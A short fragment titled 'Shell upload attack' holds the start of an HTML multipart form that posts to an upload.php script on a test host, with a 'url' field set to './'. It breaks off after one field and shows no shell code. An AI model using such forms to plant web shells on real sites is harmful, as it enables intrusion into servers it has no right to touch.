Shell upload attack:
<form enctype="multipart/form-data" action="http://www.test.com/upload.php" method="post">
<input type="text" name="url" value="./" /><br />
...